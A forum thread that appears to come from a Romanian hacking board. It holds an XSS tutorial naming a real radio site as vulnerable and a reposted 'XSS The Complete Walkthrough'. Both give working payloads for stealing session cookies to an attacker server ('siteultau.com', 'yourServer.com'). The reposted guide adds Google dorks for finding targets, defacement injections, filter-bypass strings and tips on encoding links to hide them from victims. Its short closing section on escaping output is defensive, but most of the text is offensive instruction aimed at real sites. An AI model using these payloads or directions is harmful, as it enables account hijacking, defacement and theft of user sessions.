Jump to content
Snikk

Tutorial [XSS]

By Snikk, in Tutoriale in romana

Recommended Posts

Snikk Newbie

Snikk

Posted
Posted

================================

Nik: Snikk

Date: 14.02.2009

Site: http://rstcenter.com/

================================

De obicei, vulnerabilitatea XSS este legata de cookieuri si message boxuri. Sa presupunem ca am gasit un site vulnerabil la XSS. Fie acesta:

http://www.radio3net.ro/

Scriptul il scriem in search: <script>alert(/HellSoft/)</script>

sygatesf3.gif

Acest script adaugat la URL: <script>alert(/HellSoft/)</script> nu face nimic mai mult decat a insera un message box in pui tu un text care vrei. Spre exemplu modific <script>alert(/HellSoft/)</script> cu <script>alert(/HellGate/)</script> .Tot aceiasi erroare v-a da... URL va arata in felul urmator:


http://www.radio3net.ro/search.php?str=%3Cscript%3Ealert(%2FHellGate%2F)%3C%2Fscript%3E&cx=best500albums

Decoamdata vulnerabilitatea nu face nimic, dar o putem exploata si mai mult. In loc de mesajul (HellSoft) dintre cele 2 paranteze ale alertului (ale scriptului) putem introduce: document.cookie si javascriptul care trebuie bagat la URL va arata in felul urmator: <script>alert(document.cookie)</script> . Si in cazul XSS-ului nostru:

http://www.radio3net.ro/search.php?str=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&cx=best500albums

Acest script genereaza un Message Box in care se afla cookieurile tale. Acum sa vedem cum sa facem rost si de cookieurile altor useri, ca apoi sa ma loghez pe conturile lor folosind acest cookie. Sa consideram urmatorul cod:

<SCRIPT>location.href=”http://www.radio3net.ro/search.php?str=''+escape(document.cookie)</SCRIPT>

Acest cod il introducem la url si il trimitem apoi (url’ul) la victima. Daca aceasta da click pe link, atunci cookieurile sale vor ramane la tine pe FTP sau ti se vor trimite pe mail, depinde cum este conceput stealerul.

Exemplu de link:


www.sitevulnerabil.com/pagvuln.php?ceva=<SCRIPT>location.href=”http://www.siteultau.com/cookiestealer.php?c=”+escape(document.cookie)</SCRIPT>

Link to comment
Share on other sites
paxnWo Newbie

paxnWo

Posted
Posted

asta mi se pare mie un walkthrough bunicel.

--==+================================================================================+==--

--==+ XSS The Complete Walkthrough [About] +==--

--==+================================================================================+==--

Author: t0pP8uZz

Description: Complete tutorial on XSS methods.

Date: 24/07/07

Chapters:

What is XSS?

Finding XSS Vulnerbilitys

The Basics On XSS

Deface Methods

Cookie Stealing

Filteration Bypassing

Advanced XSS

Securing XSS

--==+================================================================================+==--

--==+ XSS The Complete Walkthrough [Chapter 1 - What is XSS?]

--==+================================================================================+==--

'XSS' also known as 'CSS' (Cross Site Scripting, Easily confused with 'Cascading Style Sheets')

is a very common vulnerbility found in Web Applications, 'XSS' allows the attacker to INSERT

malicous code, There are many types of XSS attacks, I will mention 3 of the most used.

The First Attack i wana talk about is 'URL XSS' this means that the XSS wont stay on the page

it will only get executed if you have the malicous code in the URL and submit the url

we will talk more on how to use this in our advantage.

The Second Attack is input fields, Where ever you can insert data, it is very common, to be XSS

vulnerable, for example say we found a site with a search engine, Now in the search box you enter

'hacker' now hit enter, when the page loads, if it says your data like 'Found 100 Results For hacker'

ok now you see its displaying out data on the page, now what if we can exexute code? there is no possible

way to execute PHP code in this Attack, but certainly is for HTML, Javascript, but be aware this method,

Also wont stay on the server, this is for your eyes only.

The Third Attack, with this attack you will be able to INSERT data (code) and it will stay on the website.

now there are 2 kinds, it depends if we can execute PHP or HTML if we can inject PHP then we can also

inject HTML but NOT vice versa, Ok this kinda attack is normally found on Blogs, Shoutboxes, Profiles

Forums, just most places where you insert data and it stays there. now HTML is totally diffrent then PHP

HTML downloads to your pc and then your 'Browser' parses/interprets the code, (thats why its source is viewable)

With PHP the code is interpretued on the server the script is hosted on, then the data is returned to the browser.

for PHP injection its rare, But it dont harm to try. Note: PHP code cant be injected into HTML page!

--==+================================================================================+==--

--==+ XSS The Complete Walkthrough [Chapter 2 - Finding XSS Vulnerbilitys] +==--

--==+================================================================================+==--

Well to start finding these vulnerbilitys you can start checking out

Blogs, Forums, Shoutboxes, Comment Boxes, Search Box's, there are too many to mention.

Using 'Google Dorks' to make the finding easyier, Ok if you wana get cracking, goto google.com and type

inurl:"search.php?q=" now that is a common page and has alot of results, to find out some attacks move

onto the next chapter.

Also note that most sites have XSS vulnerbilitys, its just having a good eye, and some good knowledge

on how to bypass there filteration.

--==+================================================================================+==--

--==+ XSS The Complete Walkthrough [Chapter 3 - The Basics On XSS]

--==+================================================================================+==--

Well now to crack on, and start learning some Actual Methods, the most common used XSS injection is

<script>alert("XSS")</script>

now this will alert a popup message, saying "XSS" without quotes, its easily editable.

So backtracking on the last chapter im assuming you remember we talked about, search.php?q=

well you can simple try the following on a website with the same thing,

http://site.com/search.php?q=<script>alert("XSS")</script>

there are good chances of it working, but dont be worried if it dont, just try diffrent sites.

some other easy XSS (i dont think people realise they can insert HTML not just javascript)

http://site.com/search.php?q=<br><br><b><u>XSS</u></b>

if you see the bold text on the page and newlines then you knows its vuln, then can move on using some

methods explained later on in the tutorial.

--==+================================================================================+==--

--==+ XSS The Complete Walkthrough [Chapter 4 - Deface Methods] --==+================================================================================+==--

Well now you understand how XSS works, we can explain some simple XSS deface methods, there

are many ways for defacing i will mention some of the best and most used,

the first one being IMG SCR, now for those of you who dont know html, IMG SCR is a tag, that

displays the IMAGE linked to it on the webpage.

<html><body><IMG SRC="http://site.com/yourDefaceIMAGE.png"></body></html>

ok now if u change the link to a valid picture link, and save it and run it you will see what i mean.

Right now say you have found a Shoutbox, Comment box, or anything that shows your data after you submitted it

you could insert the following to make the picture display on the page.

<IMG SRC="http://site.com/yourDefaceIMAGE.png">

the other tags are not needed has the page will already have them. (rare cases they will not)

Ok it helps to make your picture big so it stands out and its clear the site got hacked.

Another method is using FLASH videos, its the same has the method below but a more stylish deface.

<EMBED SRC="http://site.com/xss.swf"

that will execute the flash video linked to it.

Or maybe using a pop or redirection?

<script>window.open( "http://www.google.com/" )</script>

There are many others ways that im not going to explain due to how busy i am, Its easy to lookup methods

using google and googleing for HTML tutorials, u can see how to embed Music ect.

--==+================================================================================+==--

--==+ XSS The Complete Walkthrough [Chapter 5 - Cookie Stealing] --==+================================================================================+==--

I decided to add this has its the most USEFULL method of XSS, and i havent seen any papers, covering it.

first grab the cookie logger from here: http://G0t-Root.net/tools/cookie.php

ok now you have it save it has a .php file and upload to your server, remember to create the file 'log.txt' too

and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do.

ok now your gona want to insert this code.

window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

or

document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen

the second one is more stealth.

Watch your file now for cookies, then you can hijack there session :D

but now you ask what if my site hasnt got, this kind of attack, it only shows data once and dont

store it. Well lets say we had a page search.php?q= we can use the following code to make a maliouc url from it

and maybe hex, base64 encode it so people cant see the code

http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

im not gona explain hexing it ect as it is pretty stright forward.

--==+================================================================================+==--

--==+ XSS The Complete Walkthrough [Chapter 6 - Filteration Bypassing] +==--

--==+================================================================================+==--

Alot of sites may seem vulnerable but not executing the code, well to solve this take note of this chapter.

Some common methods to bypass filteration is

')alert('xss');

or

");alert('xss');

that will do the same thing has <script>alert("XSS")</script> on a vulnerable server.

You can also try hexing or base64 encoding your data before you submit,

Please note its bad practice to use alert("XSS") to test for XSS, has ive known sites block the keyword XSS

before.

Some other ways to bypass filteration

<script type=text/javascript>alert("t0pP8uZz")</script>

<script>alert("t0pP8uZz")</script>;

<script>alert("t0pP8uZz");</script>

<script>alert("/t0pP8uZz"/)</script>

<script>var var = 1; alert(var)</script>

Read the next chapter for another way to bypass magic quotes filteration.

--==+================================================================================+==--

--==+ XSS The Complete Walkthrough [Chapter 6 - Advanced XSS] --==+================================================================================+==--

Ok in this chapter were going to learn about some good techniqes, that i myself havent seen

being used before, but im sure you guys will like it.

ive came across many sites where 'Magic Quotes' is on and therfore rendering some commands useless.

fear not, ive come up with a way using char codes (Decimals), to convert char code to Ascii.

The functions to turn CharCodes (Decimals) into ASCII, you can find a complete table here http://www.asciitable.com/

this will help you write what you want, In my examples ill be writing "t0pP8uZz" this is the following code

116 48 112 80 56 117 90 122

Ok now we got the Decimal value of our string, we need to know what function in javascript converts this.

String.fromCharCode()

is suitable for this kinda things, its easy to setup, im gona give it my args below.

String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122)

Ok now "String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122)" Is a JAVA (ASCII) way of saying

t0pP8uZz

and to use this with alerts ect, you dont need to use quotes, as it acts as a variable.

<script>alert(String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122))</script>

Ok now this will display or message in this case "t0pP8uZz", this method is very usefull for

bypassing magic quotes and maybe some custom escaping of quotes.

Ok before i move on i wana talk about another method useing variables. lets declare one below

var myVar = 1

ok now myVar is a longer way of saying 1.

To use variables to our advantage in XSS, we could do the following

<script>var myVar = 1; alert(myVar)</script>

and this will display the variable contents again without using quotes.

There are many others methods, that im not going to talk about, XSS is a simple Attack.

and from here you should know what you need.

--==+================================================================================+==--

--==+ XSS The Complete Walkthrough [Chapter 7 - Securing XSS] --==+================================================================================+==--

Ok this was written for WebDevelopers (yeah right..) so im gona talk about how to secure your code.

if you found XSS bugs in your scripts, its easy to secure, take a look at the below code

if(isset($_POST['form'])){echo "<html><body>" .$_POST['form']. "</body></html>";}

Ok say the variable $_POST['from'] was coming from a input box, then you have a XSS attack.

the following is a very easy way to secure that.

$charset='UTF-8'; $data = htmlentities ($_POST['form'], ENT_NOQUOTES, $charset);

if(isset($data)){echo "<html><body>" .$data. "</body></html>";}

now that will take all possible code and make it not executable. by turning it into stuff like

< ect...

You will not notice a diffrence when using htmlentries();

there are also another common function, striptags(), find more info at php.net/striptags

ok another way to show you how to secure INTEGER variables. (variables that will always contain a INT)

$this = $_GET['id'];

echo "you are viewing " . $this . "blog";

now if we include ?id=<script>alert("XSS")</script>

into the url its gona execute our code, a very easy way to secure this is using (int) check the following code

$this = (int)$_GET['id'];

echo "you are viewing " . $this . "blog";

now if at anytime the varible contains anything but a Integer, it will return 0.

Thats enough said.

--==+================================================================================+==--

--==+ XSS The Complete Walkthrough [The End] +==--

--==+================================================================================+==--

Well i hope you all enjoyied this paper, as much as i enjoyied writing it (not alot, lol).

If you got any questions feel free to come over at, g0t-root.net, h4cky0u.org

and use a help section regarding what you need help with.

--==+================================================================================+==--

--==+ XSS The Complete Walkthrough +==--

--==+================================================================================+==--

# milw0rm.com [2007-08-14]

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...